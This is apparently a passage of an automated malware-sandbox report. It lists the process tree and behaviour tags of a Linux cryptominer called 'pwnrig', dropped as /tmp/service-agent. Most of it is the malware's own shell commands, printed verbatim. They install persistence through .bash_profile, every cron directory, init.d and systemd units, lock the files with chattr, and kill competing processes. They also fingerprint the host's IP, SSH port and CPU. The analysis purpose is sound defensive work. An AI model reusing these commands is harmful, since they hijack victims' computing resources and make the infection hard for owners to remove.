/dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"3⤵
- Attempts to change immutable files
- Writes file to tmp directory
PID:1869 -
/usr/bin/idid -u4⤵PID:1870
-
-
/usr/bin/idid -u4⤵PID:1871
-
-
/usr/bin/chattrchattr -i -a /bin/bprofr "~/.bash_profile"4⤵PID:1872
-
-
/bin/rmrm -rf /bin/bprofr4⤵PID:1873
-
-
/bin/sedsed -i /bprofr/d "~/.bash_profile"4⤵PID:1874
-
-
/bin/cpcp -f -r -- /tmp/service-agent /bin/bprofr4⤵
- Writes file to system bin folder
PID:1875
-
-
/usr/bin/idid -u4⤵PID:1876
-
-
/usr/bin/chattrchattr +i +a /bin/bprofr "~/.bash_profile"4⤵PID:1877
-
-
/bin/mkdirmkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly4⤵PID:1878
-
-
/usr/bin/chattrchattr -i -a "/etc/cron.*/pwnrig" /bin/crondr4⤵
- Attempts to change immutable files
PID:1879
-
-
/bin/rmrm -rf /bin/crondr4⤵PID:1880
-
-
/bin/cpcp -f -r -- /tmp/service-agent /bin/crondr4⤵
- Writes file to system bin folder
PID:1881
-
-
/usr/bin/teetee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Creates/modifies Cron job
PID:1883
-
-
/bin/sedsed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Creates/modifies Cron job
PID:1884
-
-
/bin/chmodchmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵PID:1885
-
-
/usr/bin/chattrchattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵PID:1886
-
-
/usr/bin/whichwhich chkconfig4⤵PID:1887
-
-
/usr/bin/whichwhich update-rc.d4⤵PID:1888
-
-
/usr/bin/chattrchattr -i -a /etc/init.d/pwnrig /bin/initdr4⤵PID:1889
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig disable4⤵
- Flushes firewall rules
PID:1890
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig remove4⤵PID:1891
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:1892
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:1892
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:1892
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:1892
-
-
/sbin/systemctlsystemctl daemon-reload5⤵PID:1892
-
-
/bin/systemctlsystemctl daemon-reload5⤵PID:1892
-
-
-
/bin/rmrm -rf /bin/initdr4⤵PID:1913
-
-
/bin/cpcp -f -r -- /tmp/service-agent /bin/initdr4⤵
- Writes file to system bin folder
PID:1914
-
-
/usr/bin/teetee /etc/init.d/pwnrig4⤵
- Modifies init.d
PID:1916
-
-
/bin/sedsed -i "1 s/-e //" /etc/init.d/pwnrig4⤵
- Modifies init.d
PID:1917
-
-
/bin/chmodchmod +x /etc/init.d/pwnrig /bin/initdr4⤵PID:1918
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig defaults4⤵PID:1919
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:1920
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:1920
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:1920
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:1920
-
-
/sbin/systemctlsystemctl daemon-reload5⤵PID:1920
-
-
/bin/systemctlsystemctl daemon-reload5⤵PID:1920
-
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig enable4⤵PID:1941
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:1942
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:1942
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:1942
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:1942
-
-
/sbin/systemctlsystemctl daemon-reload5⤵PID:1942
-
-
/bin/systemctlsystemctl daemon-reload5⤵PID:1942
-
-
-
/usr/bin/chattrchattr +i +a /etc/init.d/pwnrig /bin/initdr4⤵PID:1963
-
-
/usr/bin/whichwhich systemctl4⤵PID:1964
-
-
/usr/bin/chattrchattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵PID:1965
-
-
/bin/rmrm -rf /bin/sysdr4⤵PID:1966
-
-
/bin/cpcp -f -r -- /tmp/service-agent /bin/sysdr4⤵
- Writes file to system bin folder
PID:1967
-
-
/usr/bin/teetee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵
- Modifies systemd
PID:1969
-
-
/bin/sedsed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵PID:1970
-
-
/usr/bin/chattrchattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵PID:1971
-
-
/bin/systemctlsystemctl enable pwnrige.service4⤵PID:1972
-
-
/bin/systemctlsystemctl enable pwnrigl.service4⤵PID:1993
-
-
/bin/systemctlsystemctl daemon-reload4⤵PID:2014
-
-
/bin/systemctlsystemctl reload-or-restart pwnrige.service4⤵PID:2035
-
-
-
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d2⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:2077 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵PID:2101
-
/usr/bin/whoamiwhoami4⤵PID:2112
-
-
/bin/hostnamehostname4⤵PID:2113
-
-
/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
PID:2114
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:2130
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵PID:2132
-
-
/bin/psps -A "-ostat,ppid"4⤵
- Reads CPU attributes
PID:2131
-
-
/usr/bin/idid -u4⤵PID:2134
-
-
/bin/grepgrep -v grep4⤵PID:2137
-
-
/bin/grepgrep /etc/cron4⤵PID:2136
-
-
/bin/psps x4⤵
- Reads runtime system information
PID:2135
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:2139
-
/usr/bin/idid -u4⤵PID:2140
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"4⤵PID:2145
-
-
/bin/grepgrep -v /usr/sbin/httpd4⤵PID:2144
-
-
/bin/grepgrep -v -- "-bash[[:space:]]*\$"4⤵PID:2143
-
-
/bin/grepgrep -v grep4⤵PID:2142
-
-
/bin/psps aux4⤵
- Reads CPU attributes
PID:2141
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"3⤵PID:2147
-
/usr/bin/idid -u4⤵PID:2148
-
-
-
-
/usr/bin/crontabcrontab -r2⤵PID:2899
-
-
/usr/bin/pkillpkill -f .klibsystem52⤵
- Reads CPU attributes
- Reads runtime system information
PID:2900
-
-
/usr/bin/pkillpkill -f .klibsystem42⤵PID:2901
-
-
/bin/bashbash -c "echo \"* * * * * /run/user/.klibsystem5 >/dev/null 2>&1\" | crontab -"2⤵PID:2902
-
/usr/bin/crontabcrontab -3⤵
- Creates/modifies Cron job
PID:2904
-
-
-
/usr/bin/chattrchattr -ia /etc/cron.d/.lib-knlib42⤵PID:2905
-
-
/usr/bin/chattrchattr +ia /etc/cron.d/.lib-knlib42⤵PID:2906
-
-
/usr/bin/chattrchattr -ia /var/spool/cron/.lib-knlib42⤵
- Attempts to change immutable files
PID:2907
-
-
/usr/bin/chattrchattr +ia /var/spool/cron/.lib-knlib42⤵PID:2908
-
-
/usr/bin/chattrchattr -ia /etc/cron.hourly/.lib-knlib42⤵
- Attempts to change immutable files
PID:2909
-
-
/usr/bin/chattrchattr +ia /etc/cron.hourly/.lib-knlib42⤵PID:2910
-
-
/usr/bin/chattrchattr -ia /etc/cron.daily/.lib-knlib42⤵PID:2911
-
-
/usr/bin/chattrchattr +ia /etc/cron.daily/.lib-knlib42⤵PID:2912
-
-
/usr/bin/chattrchattr -ia /etc/cron.weekly/.lib-knlib42⤵PID:2913
-
-
/usr/bin/chattrchattr +ia /etc/cron.weekly/.lib-knlib42⤵
- Attempts to change immutable files
PID:2914
-
-
/usr/bin/chattrchattr -ia /etc/cron.monthly/.lib-knlib42⤵PID:2915
-
-
/usr/bin/chattrchattr +ia /etc/cron.monthly/.lib-knlib42⤵PID:2916
-
-
/usr/bin/chattrchattr -ia /etc/anacrontab2⤵PID:2917
-
-
/usr/bin/chattrchattr +ia /etc/anacrontab2⤵
- Attempts to change immutable files
PID:2918
-
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn2⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
PID:2919 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵PID:2920
-
/usr/bin/whoamiwhoami4⤵PID:2931
-
-
/bin/hostnamehostname4⤵PID:2932
-
-
/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
PID:2933
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:2949
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵PID:2951
-
-
/bin/psps -A "-ostat,ppid"4⤵PID:2950
-
-
/usr/bin/idid -u4⤵PID:2953
-
-
/bin/grepgrep -v grep4⤵PID:2956
-
-
/bin/grepgrep /etc/cron4⤵PID:2955
-
-
/bin/psps x4⤵
- Reads runtime system information
PID:2954
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"3⤵
- Writes file to tmp directory
PID:2958 -
/usr/bin/idid -u4⤵PID:2959
-
-
/usr/bin/idid -u4⤵PID:2960
-
-
/usr/bin/chattrchattr -i -a /bin/bprofr "~/.bash_profile"4⤵
- Attempts to change immutable files
PID:2961
-
-
/bin/rmrm -rf /bin/bprofr4⤵PID:2962
-
-
/bin/sedsed -i /bprofr/d "~/.bash_profile"4⤵PID:2963
-
-
/bin/cpcp -f -r -- /tmp/service-agent /bin/bprofr4⤵
- Writes file to system bin folder
PID:2964
-
-
/usr/bin/idid -u4⤵PID:2965
-
-
/usr/bin/chattrchattr +i +a /bin/bprofr "~/.bash_profile"4⤵PID:2966
-
-
/bin/mkdirmkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly4⤵PID:2967
-
-
/usr/bin/chattrchattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵PID:2968
-
-
/bin/rmrm -rf /bin/crondr4⤵PID:2969
-
-
/bin/cpcp -f -r -- /tmp/service-agent /bin/crondr4⤵
- Writes file to system bin folder
PID:2970
-
-
/usr/bin/teetee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Creates/modifies Cron job
PID:2972
-
-
/bin/sedsed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Creates/modifies Cron job
PID:2973
-
-
/bin/chmodchmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵PID:2974
-
-
/usr/bin/chattrchattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵PID:2975
-
-
/usr/bin/whichwhich chkconfig4⤵PID:2976
-
-
/usr/bin/whichwhich update-rc.d4⤵PID:2977
-
-
/usr/bin/chattrchattr -i -a /etc/init.d/pwnrig /bin/initdr4⤵
- Attempts to change immutable files
PID:2978
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig disable4⤵
- Flushes firewall rules
PID:2979 -
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:2980
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:2980
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:2980
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:2980
-
-
/sbin/systemctlsystemctl daemon-reload5⤵PID:2980
-
-
/bin/systemctlsystemctl daemon-reload5⤵PID:2980
-
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig remove4⤵PID:3001
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:3002
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:3002
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:3002
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:3002
-
-
/sbin/systemctlsystemctl daemon-reload5⤵PID:3002
-
-
/bin/systemctlsystemctl daemon-reload5⤵PID:3002
-
-
-
/bin/rmrm -rf /bin/initdr4⤵PID:3023
-
-
/bin/cpcp -f -r -- /tmp/service-agent /bin/initdr4⤵
- Writes file to system bin folder
PID:3024
-
-
/usr/bin/teetee /etc/init.d/pwnrig4⤵
- Modifies init.d
PID:3026
-
-
/bin/sedsed -i "1 s/-e //" /etc/init.d/pwnrig4⤵
- Modifies init.d
PID:3027
-
-
/bin/chmodchmod +x /etc/init.d/pwnrig /bin/initdr4⤵PID:3028
-
